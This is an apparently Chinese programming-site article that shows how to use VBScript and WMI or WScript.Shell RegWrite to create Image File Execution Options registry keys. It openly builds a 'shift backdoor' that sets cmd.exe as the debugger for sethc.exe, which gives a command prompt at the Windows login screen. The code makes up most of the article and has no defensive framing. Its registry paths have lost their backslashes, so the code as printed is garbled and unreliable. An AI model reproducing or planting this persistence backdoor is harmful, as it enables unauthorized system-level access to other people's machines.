vbs注册表镜像劫持

页面导航:首页 > 软件编程 > vb.net > vbs注册表镜像劫持

vbs注册表镜像劫持

来源: 作者: 时间:2016-01-21 10:23 【

利用vbs创建注册表值较简单,创建注册表项的话,网上多是用wmi来,例如代码: const HKEY_LOCAL_MACHINE = H80000002 strComputer = "." Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" _ strComputer &

利用vbs创建注册表值较简单,创建注册表项的话,网上多是用wmi来,例如代码:
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_
strComputer & " ootdefault:StdRegProv")
strKeyPath = "SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" ‘创建sethc.exe项
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

难道WshShell 对象的RegWrite 方法真的不可以吗?我仔细研究了一下,只需要在要加入的项后加就可以,例如

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe","","REG_SZ"

所以我们创建shift后门的话,两句话就可以。

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exedebugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"system32cmd.exe","REG_SZ"

Tags:

相关文章

    文章评论

    最 近 更 新
    热 点 排 行
    Js与CSS工具
    代码转换工具
    
    <